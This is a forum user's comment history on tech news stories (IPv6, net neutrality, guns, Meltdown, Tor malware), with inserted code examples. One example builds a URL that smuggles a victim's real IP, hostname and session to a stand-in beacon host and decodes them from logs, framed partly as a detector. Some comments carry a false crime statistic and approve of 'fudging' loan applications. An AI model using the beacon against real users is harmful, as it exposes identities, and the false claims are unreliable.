* Posts by bombastic bob

5200 posts • joined 1 May 2015

IPv6 and 5G will make life hell for spooks and cops say Australia's spooks and cops

bombastic bob Silver badge
Coat

Re: Backdoors don't matter.....

I'll just stick with ROT-13 - it's secure enough for everyone!

bombastic bob Silver badge
Devil

Re: So they want..

"With ipv6 they can do a 1-to-1 mapping of IP address to device, which surely is much stronger from the point of view of burden of proof."

not only that, but an IPv6 user is likely to have an assigned netblock, which "identifies" you. So, in actual fact, it's EASIER to tell who you are, because your netblock won't change.

As I recall, I've got two /64 blocks assigned to me. that leaves about 2**60 netblocks for everyone else, assuming that we're all assigned netblocks from 2000::/3

https://www.iana.org/assignments/ipv6-address-space/ipv6-address-space.xhtml
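The point above, that a subscriber's delegated /64 stays put even when the low 64 bits of the address change, as an added example (not from the original post). It groups a constructed sample of IPv6 log entries by their /64 prefix using the standard `ipaddress` module, ignores anything outside 2000::/3 (link-local, ULA, IPv4), and also computes how many /64 blocks fit in 2000::/3. The addresses come from the 2001:db8::/32 documentation range and the request strings are made up.

```python
"""Added example (not from the original post): group IPv6 addresses by /64 prefix.

Privacy extensions rotate the interface-identifier half of an address, but the
/64 delegated to a subscriber is usually stable, so entries from "different"
addresses still cluster under one prefix. All addresses below are constructed
sample data in the 2001:db8::/32 documentation range.
"""
import ipaddress
from collections import defaultdict

GLOBAL_UNICAST = ipaddress.ip_network("2000::/3")

# Constructed sample log: (source address, request) pairs.
SAMPLE_LOG = [
    ("2001:db8:1:2:a1b2:c3d4:e5f6:0001", "GET /login"),
    ("2001:db8:1:2:9999:8888:7777:6666", "GET /account"),  # same /64, new interface ID
    ("2001:db8:1:2:1:2:3:4", "POST /transfer"),
    ("2001:db8:ffff:1::10", "GET /"),
    ("fe80::1", "GET /"),  # link-local: not globally routable, says nothing about a delegation
    ("192.0.2.5", "GET /"),  # IPv4: not part of this analysis
]


def subscriber_prefix(addr: str, plen: int = 64) -> str:
    """Return the /plen prefix an address belongs to, e.g. '2001:db8:1:2::/64'."""
    return str(ipaddress.ip_interface(f"{addr}/{plen}").network)


def group_by_prefix(entries, plen: int = 64) -> dict:
    """Map each /plen prefix inside 2000::/3 to the requests seen from it."""
    groups = defaultdict(list)
    for addr, request in entries:
        ip = ipaddress.ip_address(addr)
        if ip.version != 6 or ip not in GLOBAL_UNICAST:
            continue
        groups[subscriber_prefix(addr, plen)].append(request)
    return dict(groups)


def prefixes_in_global_unicast(plen: int = 64) -> int:
    """Number of /plen blocks that fit in 2000::/3."""
    return 2 ** (plen - GLOBAL_UNICAST.prefixlen)


if __name__ == "__main__":
    for prefix, requests in group_by_prefix(SAMPLE_LOG).items():
        print(f"{prefix}: {len(requests)} requests -> {requests}")
    print(f"/64 blocks in {GLOBAL_UNICAST}: 2**{prefixes_in_global_unicast().bit_length() - 1}")
```

Run it and the three addresses in 2001:db8:1:2::/64 collapse into one line, which is exactly the correlation a log reviewer (or an ISP answering a warrant) would perform; the same grouping at /48 or /56 is what you would use where the delegation is larger than a single /64.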

Why, why, Mr American Pai? FCC boss under increasing pressure in corporate favoritism row

bombastic bob Silver badge
Devil

maybe what's REALLY happening is...

maybe what's REALLY happening is that the regulatory environment over at the FCC is becoming LESS "favored" towards those who've benefited from such "favoritism" in the past, which just HAPPENS to benefit one particular company, who perhaps has been TOO REGULATED until now?

Just a thought. But it goes against a one-sided rant against Pai. You guys just don't like him because he shut down regulations at the FCC that would enforce "net neutrality", which is anything BUT what its name implies...

I say "net free-for-all" and just comply with the technical standards so the nodes can still talk to one another. you know, like what it was for >20 years before "net neutrality". It seemed to work pretty well BEFORE, so why did we need "all this regulation" shoved into our orifices?

Oh _I_ know why: to EMPOWER BUREAUCRATS so they *COULD* engage in various forms of favoritism! [and would THAT be so eagerly and well reported on if it were favoring OTHER than a large media company like Sinclair ???]

Just sayin'... (and the downvotes are badges of honor, thanks in advance)

Symantec ends cheap Norton offer to NRA members

bombastic bob Silver badge
Devil

"What do a gun manufacturer lobby and internet security have to do with each other?"

Nothing. But the NRA is more like a club or an organization, with membership (not a manufacturer lobby).

Apparently Symantec just wanted NRA members to have an introductory offer as a benefit for membership [maybe it was part of an advertising deal or something with the NRA]. You might see similar *kinds* of discounts for AARP members. Right?

In any case, Symantec probably angered too many potential customers by caving to the LEFTIST BULLIES like that. Yeah, empower and enable those FASCISTS who hate freedom by caving into their demands instead of telling them to GO TO HELL!

The 2nd amendment is MOSTLY about the right to self defense. "Infringe" on THAT, and you get a population of easily controlled "sheeple", when it becomes ILLEGAL to kill someone in the defense of life/injury/property, someone who's trying to kill/rob/rape YOU. Or your family. Or your neighbor. And so on.

But as for ME, I'd rather use my BARE HANDS to defend myself. Heh. Heh. Heh.

bombastic bob Silver badge
Stop

Re: That'll show 'em!

"actually this kind of boycott/pressure is one of the only ways small consumers can impact the behaviour of large corporations."

actually, this kind of boycott/pressure is done by a HANDFUL OF PEOPLE who use bots to make 1 person look like 10,000, willing accomplice web sites like faecebook and twatter, and various bullying and intimidation techniques to (essentially) SILENCE! THE! OPPOSITION! even though THEIR opinion is in the minority.

it's how "the left" does what they do. It's been going on for DECADES, in one form or another. It's a classic 'Saul Alinsky' tactic, from paid protesters getting "special media attention" so that the 100 protesters look like thousands, yotta yotta yotta. This shouldn't surprise anyone.

And Symantec won't be getting MY business. (well, I don't really want their stuff anyway)

Rush Limbaugh has done a VERY good job of exposing some of these idiots, when they went after HIS advertisers on twitter a while back... using BOTS to make themselves look like a 'legion' when in fact, it was 10 people. Yes, he named names. wanna see?

https://www.rushlimbaugh.com/daily/2014/09/23/the_hidden_story_behind_stop_rush/

Imagine the libel suits (that did NOT happen) if he had been WRONG about this...

And THAT is the point: boycotts are BULLY TACTICS used by DESPERATE LEFTIES that can't win in the arena of ideas by stating their case to an intelligent audience. Instead, they must manipulate emotions, engage in "this kind" of behavior, make themselves look bigger than they really are, intimidate, protest, make a lot of noise, and generally be a PAIN in the rest of the world's ASS.

Does anybody REALLY wanna be CONTROLLED by THESE people? I sure don't!

Boycotts are the TACTIC of MANIPULATIVE HOODLUMS. I suggest NOT participating in them. And threatening people WITH boycotts is even WORSE. (and I don't have much respect for companies who cave to these idiots, either)

/me points out that if I found out Obaka likes (or hates) Starbucks coffee, it won't affect my opinion of them. I'd still go for a cappuccino on occasion, or purchase a bag of Espresso Roast beans...

Intellisense was off and developer learned you can't code in Canadian

bombastic bob Silver badge
Devil

"DELETE FROM HISTORY;"

oops!

2 lessons:

a) do backup first

b) use 'SELECT *' in place of 'DELETE' in a test query before changing it to 'DELETE'
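The two lessons above, wrapped into one routine as an added example (not from the original post). It runs over SQLite so it works offline: the predicate is rehearsed as a `SELECT COUNT(*)` before it is ever used in a `DELETE`, a copy of the table is taken inside the same transaction, and the live row count is compared against the rehearsal before `COMMIT`. An empty `WHERE` (the "DELETE FROM HISTORY;" case) is refused outright. The `history` table, its rows and the `max_rows` limit are constructed for the example.

```python
"""Added example (not from the original post): rehearse a DELETE as a SELECT first."""
import sqlite3


def make_sample_db() -> sqlite3.Connection:
    """Constructed sample data: a small 'history' table in an in-memory database."""
    conn = sqlite3.connect(":memory:", isolation_level=None)  # autocommit; we BEGIN ourselves
    conn.execute("CREATE TABLE history (id INTEGER PRIMARY KEY, user TEXT, ts INTEGER)")
    conn.executemany(
        "INSERT INTO history (user, ts) VALUES (?, ?)",
        [("alice", 100), ("bob", 200), ("alice", 300), ("carol", 400)],
    )
    return conn


def safe_delete(conn, table, where, params=(), max_rows=None, backup=True) -> int:
    """Delete rows matching `where` from `table`, but only after a dry run.

    - refuses an empty predicate (the "DELETE FROM HISTORY;" mistake)
    - lesson (b): runs the predicate as SELECT COUNT(*) first and refuses if it
      matches more than `max_rows`
    - lesson (a): copies the table to <table>_backup inside the same transaction
    - rolls back if the live DELETE touches a different number of rows than the
      rehearsal predicted
    Returns the number of rows deleted.
    """
    if not where.strip():
        raise ValueError("refusing DELETE without a WHERE clause")
    if not table.isidentifier():
        # Table names cannot be bound as parameters, so restrict them to plain identifiers.
        raise ValueError("table name must be a plain identifier")

    (expected,) = conn.execute(f"SELECT COUNT(*) FROM {table} WHERE {where}", params).fetchone()
    if max_rows is not None and expected > max_rows:
        raise ValueError(f"predicate matches {expected} rows, limit is {max_rows}")

    conn.execute("BEGIN")
    try:
        if backup:
            conn.execute(f"DROP TABLE IF EXISTS {table}_backup")
            conn.execute(f"CREATE TABLE {table}_backup AS SELECT * FROM {table}")
        cur = conn.execute(f"DELETE FROM {table} WHERE {where}", params)
        if cur.rowcount != expected:
            raise RuntimeError(f"DELETE removed {cur.rowcount} rows, rehearsal said {expected}")
        conn.execute("COMMIT")
        return cur.rowcount
    except Exception:
        conn.execute("ROLLBACK")
        raise


if __name__ == "__main__":
    db = make_sample_db()
    print("deleted", safe_delete(db, "history", "user = ?", ("alice",), max_rows=10))
    print("remaining", db.execute("SELECT user FROM history ORDER BY id").fetchall())
    print("backup rows", db.execute("SELECT COUNT(*) FROM history_backup").fetchone()[0])
```

The `max_rows` guard is the part worth keeping in real tooling: a predicate that "should" match a handful of rows but matches thousands is the usual sign that the `WHERE` is wrong, and it is far cheaper to find that out from a count than from a restore.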

bombastic bob Silver badge
Devil

Re: Archimedes

I've seen 'colour' and other things spelled that way in wxWidgets, as I recall...

bombastic bob Silver badge
Coat

Re: I've never quite understood

"As any fule know, 'colour' rhymes with 'yellow'."

/me ponders for a moment... 'old yellow' - now you're making me foam at the mouth!

heh - only kidding... or?

coat, please

bombastic bob Silver badge
Devil

#define IF(X) if(0)

#define ELSE if(0)

heh

(ok that doesn't work in Java but still...)

bombastic bob Silver badge
Devil

"'Queens English' - the language spoken in one of the boroughs of New York City."

And the current U.S. President! Heh.

bombastic bob Silver badge
Devil

Re: Boro

as a kid, for the longest time, I was confused by the spelling of 'bough' - always thought it was pronounced 'bow' like 'bow and arrow', and not 'bow' as in 'bow to show respect'. And in my mind it was never connected to the spelling for 'tree bough'. It may be the worst example of arcane non-phonetic spelling causing confusion. [but in middle english it probably rhymed with 'cough'].

bombastic bob Silver badge
Joke

background-colour <-- fixed

bombastic bob Silver badge
Devil

perhaps he needed a "non-US-english.h" with a bunch of #define aliases in it

EU aviation agency publishes new drone framework. Hobbyists won't like it

bombastic bob Silver badge
Devil

Re: Drone makers rush

"Seems fairly reasonable to me."

as someone who apparently flies model aircraft AND people-driven aircraft, I think your opinion should carry a lot of weight.

After a cursory look at the article, I didn't see anything really bad, either. Local authorities being able to exempt flying clubs and specific locations is probably the BEST part, since it avoids the "top down dictatorial way" of handing down regulations, which rarely (if ever) really fixes a problem everywhere, equally.

And if you can't see the thing flying, it's not a bad idea for you to need some kind of 'pilot creds' to fly a drone outside of visual range.

The FAA could do something very similar and I'd be happy with it.

Apple: Er, yes. Your iCloud stuff is now on Google's servers, too

bombastic bob Silver badge
Trollface

Re: But...

"Beard trimmers and latte makers"

you don't need a beard trimmer THAT often - just when you need to make a public appearance. Like "when do you need to shower" or "when do you need to change clothes". [my underwear is itchy, time to change it - ha ha ha ha ha]

/me wonders if it's actually 'that way' inside the cubes at Apple. Heh.

Oh, and latte is too weak. Cappuccino or Espresso [or Jolt] and don't forget powering the mini-fridges.

bombastic bob Silver badge
Devil

Re: Bah!

Alanis Morissette? I don't get it...

(then again I don't like her "music", nor 'that whiny style' from the 90's in particular, so maybe that's why I don't get it)

But since Apple (apparently) isn't a cloud provider, they gotta use SOMEBODY's cloud server...

/me thinks that if you store your data [strongly] encrypted, such that ONLY YOU have the decrypt key, then it could be stored in a publicly viewable place and STILL be secure.

[then it wouldn't matter who snoops or subpoenas your data, it will be worthless to them]

Or, just don't 'iCloud' anything. There's an invention called an SD card. you could store things on THAT, instead.

Trump buries H-1B visa applicants in paperwork

bombastic bob Silver badge
Devil

Re: Off shore slumming

well, we WANT it to be "hire local expertise at the going rate" rather than "import people to drive the cost down".

but yeah, unintended consequences being what they are, hard to say how it will work out unless we let it run for a while, see how it goes.

Just out of curiosity, how does UK handle _their_ equivalent of H-1B?

Unlucky Linux boxes trampled by NPM code update, patch zapped

bombastic bob Silver badge
FAIL

Re: One Consolation in this.

"But, if you have to write complex web frontend behavior"

then you're stuck with an idiotic/clueless design that should be scrapped for something that does bulk of the work server-side instead, and without JavaScript.

but yeah that would require more serious developers with *REAL* skills... instead of pretend "developers" who "program" using JavaScript (read: slap together several bloatware packages into a chimera-monster and call it 'programming').

Huawei guns for Apple with Mac-alike Matebook X

bombastic bob Silver badge
Devil

Re: When?

and can it come with OS/X [or another non-MS OS] in lieu of Win-10-nic ???

Because, if it has Win-10-nic, I ain't buying.

We all hate Word docs and PDFs, but have they ever led you to being hit with 32 indictments?

bombastic bob Silver badge
Devil

Re: There's a worrying implication

well, consider this:

a) you go to your bank because you NEED MONEY, because (for some reason) you didn't earn enough and there are expenses

b) The bank checks your CURRENT income and says "no we cannot lend you money because you actually NEED it right now"

Now, the bank WANTS to lend you money, because you make THEM money when you pay it back. So what happens normally? Well, they make a decision based on you, your history, how much of your money has flowed through their bank, what your credit rating is, and so on. THEN they give you an approval based on "all of that", sometimes coaching you to 'fudge a little' so they can "sell you the loan".

This is just business as usual, in reality. The banks want you to pay them because they'll lose money if you don't. But sometimes stupid-regs just "get in the way" and so the loan officers know how to 'adjust' things accordingly to make it work. And it does. And we move forward, pay our bills [most of the time], and everybody's happy, and nobody outside of the bank and customer REALLY NEEDS TO KNOW the details of that process.

Added: business loans and lines of credit are a bit different than mortgages...

Why isn't digital fixing the productivity puzzle?

bombastic bob Silver badge
Devil

"Employment is falling"

you meant UNemployment is falling, right? Fixed.

bombastic bob Silver badge
Pint

Re: Millenials

"Smartphone / social media obsession cannot be helping output per worker as the opportunity for distractions increases."

A *BRILLIANT* point! beer?

[I might add, the (apparently 'millennial') trending use of online and cloudy 'things' which, from what I can tell, aren't quite as good as the ones they were patterned after, seems to be a part of it. And, if you view the world through a 4-inch screen (like many millennials seem to do), you get a very NARROW perspective of it, in particular, one that's _marketed_ to you, so that you don't easily see anything else...]

bombastic bob Silver badge
Thumb Down

Re: If people don't get paid enough money...

1% this, 1% that...

you're STILL doing that 'Occupy' crap? That's SO lame...

'Scuse me, your "envy politics" is showing.

bombastic bob Silver badge
Devil

Re: Well, there's your problem!

"If all you do is manage a team of coders then you need to earn less than those coders."

hold on there, that's a bad generalization to make [though I'm sure there are a lot of UNproductive 'managers' out there].

Management done properly makes it look as though the manager isn't doing anything at all.

It's the manager's job to divvy up the work assignments so that things get done. It's the manager's job to make sure that interactions happen in a SANE way. If that means "Scrum meeting" then it's probably being done WRONG. if it means individual 1-on-1 meetings (as simple as "how are things going") followed up by some kind of a policy decision, then it's probably being done right. If your problems with 'management' are being dealt with [or there aren't any] it's being done right. if you're constantly getting jerked around and following whatever Sales wants done, it's probably being done wrong.

I would think that departmental productivity should be the #1 factor in determining how much a manager is paid. And SOME managers might be worth 10 times the wage of the average developer, just on the fact that developers become so much more productive when "that guy" is running the show.

So YMMV on management salary. But yeah, a proper measuring device is in order.

bombastic bob Silver badge
Pint

"the productive parts of the economy are now so wrapped in red tape and security theater that they have stopped expanding"

A *VERY* good way of saying it! Beer, sir!

bombastic bob Silver badge
Thumb Down

Re: Our missing productivity was shifted to China

"the old capitalism is the only way that works argument"

"relies heavily on defining "all" to exclude the brown people" (etc.)

"Is that the system you are promoting?"

thanks for tossing in the 'emotion bomb' of racism into an otherwise sane discussion, like a Hand Grenade.

I officially downvote the HELL out of your comment, on that basis.

bombastic bob Silver badge
Devil

Re: It doesn't take a flashy report with pretty graphs...

"people making minimum wage put in minimum wage effort." "You get what you pay for"

This is converging closer to reality, now.

You can make economic criticism from both the right and left, talk about effective take-home wage vs what you're actually paid (in which case, tax cuts are an obvious stimulus to the economy from a 'consumption' point of view), or the 'widening gap between rich and poor' in which case there's apparent exploitation going on [as has happened in the past, ca "robber baron" era].

But each of these is an inadequate explanation on its own, as they're interrelated. When the employees don't have enough $ to live on comfortably, it screws with their psyche, and when this causes a perception of "have vs have not" envy, it makes things worse. [keep in mind that high tax rates on 'the rich' are actually on upper middle class WAGE EARNERS, and tend to WIDEN that gap, because it keeps upper middle class from BECOMING 'the rich' - prior to last December, 'the rich' were getting away with paying LOWER taxes because the income wasn't WAGE income - but I digress].

Here are some of the negative aspects that create productivity problems, in my view:

1. Hiring the wrong person. This is ALWAYS expensive. There are many reasons why, from race/sex/whatever quotas [gummint mandates and lawsuits] to HR incompetence. "What Color is your Parachute" talks about this, from what I recall.

2. Actual collusion to pay people less - this happened in Silly Valley a while back.

3. Inefficient management - too many meetings, for example, or focus on "social" instead of "work output". You can 'feel good' about it all damn day and NOT get a damn thing done! This isn't helping anybody.

4. Punishing achievement and rewarding mediocrity. This is a complex issue, because it happens in the tax code [work more/harder, less effective $ per hour], and seeing promotions based on something OTHER than merit (like race/sex/whatever quotas). Productivity and quality must be rewarded, or else you get "who gives a flying FEEL any more" with dead-end jobs and looking to go elsewhere all the time.

5. "Process of the week" involving the latest new, shiny way to do engineering work, like "Agile" done wrong by everyone that attempts it. Scrum meetings in which "the junior guy" gets an equal say, for example, and management going along with it because it FEELS good to let 'the newbie' get a chance to contribute.

Anyway, that's my $.10 on it. You basically can't point at a single thing, but when you look at ALL of it, there could be a pattern...

Does my boom look big in this? New universe measurements bewilder boffins

bombastic bob Silver badge
Black Helicopters

Re: 2011 Nobel Prize (Reiss, Perlmutter, and Schmidt)

" It's the Russians. They get everywhere these days."

you haven't heard the newest conspiracy then: It's really the Chinese government _PRETENDING_ to be Russians... with help from the NSA, so they can later blame the North Koreans.

bombastic bob Silver badge
Mushroom

Re: Possibly.

distance from gravitational center of the universe as "a factor" - how's that?

as I understand it, we're pretty close to that gravitational center (which should be the place the big bang happened). At least, that's what it looks like from our perspective.

/me wonders if the big bang made a mushroom cloud... thus, icon choice [ok it didn't because 'ground' and 'gravity' are needed to make a proper mushroom cloud, but it's still lame-funny]

bombastic bob Silver badge
Trollface

Re: Or in this case

"(see new paper to be released around April)"

I can't wait to read it!

You know, like RFC8140 and its predecessors.

bombastic bob Silver badge
Devil

Re: The edge is nothing more than a ripple in the pond

"taking two days to travel from Los Angeles, CA to San Antonio, TX"

Highway 8 through "the Zone" (Arizona) is wide open and empty space. Lots of it.

Doesn't part of that trip go through Mexico? But you're British and you already had your passports [it's just that rental car companies don't really like it when you do that, you have to get Mexican car insurance at the border, yotta yotta]. Anyway there's a way around but it takes WAY longer.

bombastic bob Silver badge
Meh

Re: You will never know the horrible truth about dark oil, err... dark matter!

"Post Brexit they need a new variable yurrupean one."

yeah what WAS it with all the science-re-namey things. The first time I heard 'Sieverts' I was all "what the hell?" and then I googled and found out that someone changed the name AND 1 Sv became 100 REM which is like "thanks a LOT for making me do more math in my head".

New 'SI' units meant "we were not very busy at that moment, so we did some make-work and appeared like we were doing something important for a while".

So why NOT come up with something more 'European' than 'Hubble Constant'? You can't have British or American scientist names in things any more, after all...

https://en.wikipedia.org/wiki/Edwin_Hubble

Let's call it "Lemaître's constant" from now on, then. He's a Belgian [that's EU enough, right?]

bombastic bob Silver badge
Devil

Re: Breath in, breath out

and we also assume that TIME is constant and/or follows our current predictions of relativity, and that light isn't somehow "lensing" due to the combined gravity of everything in the universe. If light traveled kind of "curvish" towards us (due to combined gravitational effects, let's say), we'd see distances as being farther than they actually are, through parallax and other means. And the farther away, the more curving you'd get, and really distant objects are hard enough to measure correctly, so is a 9% error THAT unexpected?

Need a better ruler, that's all.

/me imagines the sky through a sort of fish-eye lens, where the position of really distant luminous objects is slightly distorted from gravitational effects. that might do it, yeah. In that case, radio telescopes with finely tuned measurements _might_ be able to detect this.

bombastic bob Silver badge
Devil

Re: Dark matter/energy.

'dark energy' may simply be trying to explain something that's a bit more elegant, sort of like the way geocentrists tried to explain planetary motion. In their model, each planet revolved on an invisible disk around a center point, and the center point revolved about the earth. it worked in mechanical representations, since each of the 'disks' was basically earth's orbit. And it "explained" motion by predicting planetary positions mechanically. but it was WAY wrong.

One model I've seen may coincide with the observations a bit better. it would mean the universe is a bit smaller, though [or maybe way bigger?]. it's a non-linear way of looking at light propagation. The thought is that light travels "faster" over a distance. In under a few light years, the actual time it takes for light to travel from star to observer is roughly the same as the distance in, well, light years. But according to THIS model, vast distances travel FASTER because light is traveling in curved space. So in that model, the light seems to 'accelerate'. It explains a lot of the red shifting [not all of it] and the apparent acceleration of the expansion of the universe. It's also 'cool' in that something nonlinear is happening.

Anyway, just thought I'd throw that out there. I forget where I read about this, I just remember reading it back in the 80's or 90's. Is it true? Idunno. Is it a rectally extrapolated attempt to prove the universe isn't created by the big bang? That's a distinct possibility [it seems to have been a somewhat liked idea amongst the creationists to counter 'big bang', though I doubt it proves a 6,000 year old earth]. But the idea that light does not travel "linearly" through space has other implications that might revolutionize physics, if it's actually true...

(and we COULD be staring at the proof, right now!)

NRA gives FCC boss Ajit Pai a gun as reward for killing net neutrality. Yeah, an actual gun

bombastic bob Silver badge
Megaphone

Re: We have the clueless leading the blind...

" it now appeared 4 trained law enforcement officers did not feel able to take on a shooter with an AR15 rifle. Quite how a teacher with a concealed carry handgun is expected to do more bemuses me."

__I__ would have done it, WITHOUT hesitation, if for no other reason, for the LULZ. "A shooter - IT'S MY CHANCE!!!"

And, your (condescending?) attitude towards teachers disturbs me.

A teacher who is former military, or who may even be a volunteer cop or deputy, and has gone through police and/or military firearms training, would be MORE than capable. And a teacher with some NRA training would be ok, too. Keep in mind, NOT EVERYONE is a simpering COWARD. A number of us are into martial arts, and wouldn't hesitate to defend ourselves or another human being from an EVIL PERPETRATOR. And consider how one of the PE coaches acted as a HUMAN SHIELD (apparently tossing students through open doorways, etc.) and died a hero, saving the lives of as many students as he could. If he'd had a PISTOL, I bet he would have SHOT THE PERP! And, THAT is what _I_ am talking about! It's the kind of bravery that stops a criminal from causing a MASSACRE.

Those 4 cops you mentioned should be *FIRED*. One of them quit on his own.

I think nothing would make me happier, if I had a concealed carry permit, than being able to USE MY WEAPON to defend against something like that. "This is what I've TRAINED for, PRACTICED for, endured the rectal exam to get my concealed-carry permit for! MY CHANCE! W00T!"

And there are enough people like ME in the USA that there's no shortage of volunteers who would say the same *KINDS* of things, and actually *MEAN* it.

(and yes, I'm ex-military, and I know how to shoot).

Now consider this: if schools weren't labeled as "gun free zones", would the school shooter STILL have tried this? because, if it's "gun free" then ONLY a criminal will have one...

bombastic bob Silver badge
Megaphone

Re: We have the clueless leading the blind...

"A few are accidents, some are suicides, the vast majority are murders"

not true. the vast majority are SUICIDES:

https://www.nytimes.com/2015/10/09/upshot/gun-deaths-are-mostly-suicides.html

"More than 60 percent of people in this country who die from guns die by suicide"

And that is the NY Times, and not Fox News, though Hannity has been talking about this kind of thing all week.

FYI - it's my understanding that murder statistics with KNIVES are several times that of guns (3 or 4 times I think), and even MORE murders are with BARE HANDS! (or feet, part of the same statistic).

So... anti-gun people, get your FACTS STRAIGHT before you go off on your emotion-filled manipulative tirade against SELF-DEFENSE, simply because YOU have issues with guns in the hands of LAW ABIDING CITIZENS for the purpose of DEFENDING THEMSELVES. You can't have a cop everywhere to protect everyone against "the bad guys". And even if you do, SOME of those cops may even cower behind cover until the bullets stop flying! (this REALLY happened a week ago, a sheriff's deputy hid for 4 of the 6 minutes' worth of shooting, instead of putting his life on the line to save at least SOME of the students that were shot by the (allegedly) psychopathic school shooter - firing in the air would've at least distracted the perpetrator and caused him to focus on YOU instead, or maybe hide, or whatever, ANYTHING to disrupt his 'fish in a barrel' shooting spree)

In any case, if you want PROTECTION, it's gotta be SELF protection! You can't trust law enforcement, they can't be everywhere, and if you can protect YOURSELF, you're better off.

bombastic bob Silver badge
Unhappy

Re: We have the clueless leading the blind...

"There is no doubt that Ajit Pai is clueless on net neutrality and wrong to have killed it."

I have _LOTS_ of doubt, about that statement in particular. Ajit Pai de-regulated by killing off something that the FCC shouldn't have been trying to regulate in the FIRST place.

And stop calling those regulations "net neutrality" please. It's such a "wrong descriptive" name. 'Net Neutrality' makes it SOUND like it protects people. The truth is, it restricts what services you can get, by ensuring that EVERYBODY is EQUALLY "mediocre", and NOBODY can pay extra for a 'fast lane'.

That's right. We'll all just FLY COACH. On 'Spirit Air'. No more 1st class, no more business class, just "cram 'em all into a can" coach. This analogy is similar to how so-called "net neutrality" is implemented.

Tor pedo's torpedo torpedoed: FBI spyware crossed the line but was in good faith, say judges

bombastic bob Silver badge
Devil

Re: Then what is the point of Tor?

well, it's difficult to trace your real IP address via Tor. Lots of strategies exist, like monitoring 'exit points' and whatnot, but the best one (probably) is to effectively load some kind of malware onto the client's computer using some known flaw in his Tor browser, or flash [another reason NOT to use flash].

Malicious javascript executing in the browser might be able to get information onto a server of choice, via a simple 'GET' request using an alphabet-soup URL that embeds your information in it, that retrieves a graphic that looks benign [or is even a 'classic' 1x1 transparent GIF like the ones sometimes used by ad trackers].

Then the 'alphabet soup' URL is simply logged, and after reviewing the logs, then "they" _KNOW_ it's YOU.
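Both halves of the beacon described above, as an added example (not from the original post, and not any real tool's code). The client-side half packs a few fields into the query string of a request for a 1x1 GIF; the server-side half pulls them back out of an ordinary combined-format access log line. `beacon.example.test`, the field names and the sample log line are all constructed for the example. Nothing here defeats Tor on its own; it only shows why any fetch that leaves the Tor circuit (plugins, scripts running with network access) is the thing to worry about, and what such a request looks like in a log if you are hunting for it.

```python
"""Added example (not from the original post): encode facts into an image URL, decode from a log."""
import base64
import json
import re
from urllib.parse import parse_qs, urlencode, urlparse

BEACON_HOST = "https://beacon.example.test"  # hypothetical collection server
BEACON_PATH = "/pixel.gif"

# Combined log format: src - - [time] "GET path HTTP/x.y" status size ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "GET (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d+)'
)


def build_beacon_url(facts: dict) -> str:
    """Client side: pack `facts` into the URL of an innocuous-looking image request."""
    raw = json.dumps(facts, sort_keys=True).encode()
    blob = base64.urlsafe_b64encode(raw).decode().rstrip("=")  # the 'alphabet soup'
    return f"{BEACON_HOST}{BEACON_PATH}?{urlencode({'v': blob})}"


def decode_beacon(log_line: str):
    """Server side: recover the facts from one access-log line, or None if it is not a beacon."""
    m = LOG_RE.match(log_line)
    if not m:
        return None
    url = urlparse(m.group("path"))
    if url.path != BEACON_PATH:
        return None
    blob = parse_qs(url.query).get("v", [None])[0]
    if blob is None:
        return None
    padded = blob + "=" * (-len(blob) % 4)  # restore base64 padding
    try:
        facts = json.loads(base64.urlsafe_b64decode(padded))
    except ValueError:  # covers binascii.Error and JSONDecodeError
        return None
    # The TCP-level source is logged too, so the two can be compared.
    return {"log_src": m.group("src"), **facts}


# Constructed sample: what a script inside the browser might have learned, and the
# resulting log line on the collection server (192.0.2.9 is the address the request came from).
SAMPLE_FACTS = {"real_ip": "203.0.113.7", "hostname": "desktop-01", "session": "abc123"}
_u = urlparse(build_beacon_url(SAMPLE_FACTS))
SAMPLE_LOG_LINE = (
    f'192.0.2.9 - - [10/Mar/2018:12:00:00 +0000] "GET {_u.path}?{_u.query} HTTP/1.1" 200 43'
)

if __name__ == "__main__":
    print(build_beacon_url(SAMPLE_FACTS))
    print(decode_beacon(SAMPLE_LOG_LINE))
```

From the defensive side, `decode_beacon` doubles as a detector: run it over a web proxy log and any line that decodes to a dictionary is a request carrying structured client data out in its URL, which is worth an alert whether or not the destination is known.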

bombastic bob Silver badge
Devil

Re: My sympathy meter is broken

"They have the legal right to hack into any computer they want, anywhere in the world."

Only under U.S. law would it be "legal". In theory, if one of them ever showed up in another country where such alleged hacking took place, the FBI guy responsible for the hacking could STILL be arrested for it, "over there".

And the country where the server hack took place could STILL file for extradition, etc. if they wanted to.

Yeah, like it would ever happen...

OpenBSD releases Meltdown patch

bombastic bob Silver badge
Devil

Re: Nitpick

really? well I'm actually looking forward to the FBSD fix.

bombastic bob Silver badge
Boffin

Re: Still concerning ...

"Meltdown is not a processor microcode issue"

that may not actually be true. In the case of meltdown, it's a serious design flaw in which a memory access is being done during 'out of order' execution, that bypasses normal tests. "At some point" the page fault or protection fault will occur, but not until AFTER the memory location was actually read in.

The problem here might be fixable with microcode if the microcode can be modified to avoid actually reading any memory location until after all "leading up to it" read operations have been access checked.

As I understand it, Meltdown crafts code to execute 'out of order' by first reading a kernel memory location into a register, and then uses that value as an index into an array. The 'out of order execution' model ends up calculating the correct memory offset (even though there should have been an access violation) and then 'hits' the memory location within the array [and you use the side-channel technique of measuring which block of your array is now 'cached' after that]. A page fault or some kind of access violation occurs too long AFTER the kernel memory was accessed, and (specifically) NOT before reading the memory location within the array indexed by the kernel memory location's byte value, which is what makes this attack possible. [the array would be specifically designed for this and deliberately flushed from all caches before doing this, one byte at a time].

Fixing this would involve determining that the initial access into kernel space was not valid, and thereby STOP the rest of the 'out of order / hyperthreading execution' stuff from happening. This assumes it's microcode, and not flawed silicon causing this. It also explains why Intel is vulnerable, and not AMD, because [apparently] the AMD people figured out that this was a BAD thing beforehand.

And then I have to wonder if there's a slight performance hit by doing this in the silicon or in the microcode, therefore implying that Intel 'cheated' by allowing the flaw to be there to get a slight boost in speed over AMD. This last part is pure speculation of course. It could have been accidental, too.

So yeah, MAYBE Meltdown can be patched in microcode. Unless you've heard different from Intel... ?

Intel didn't tell CERTS, govs, about Meltdown and Spectre because they couldn't help fix it

bombastic bob Silver badge
Devil

Re: Specter / Meltdown were not mistakes...

"These security holes are a direct result of using caching and speculative execution together"

an interesting point. So a mitigation MIGHT be to NOT physically access anything that isn't in the L0 cache during speculative execution? And, of course, to NOT physically access any memory address for which memory flags would cause a protection fault or page fault [aka 'Meltdown']

Doing these things in microcode would END the vulnerabilities as I understand them, with only a limited effect on execution speed.

To mitigate those changes, a serious increase in L0 cache size would also help.

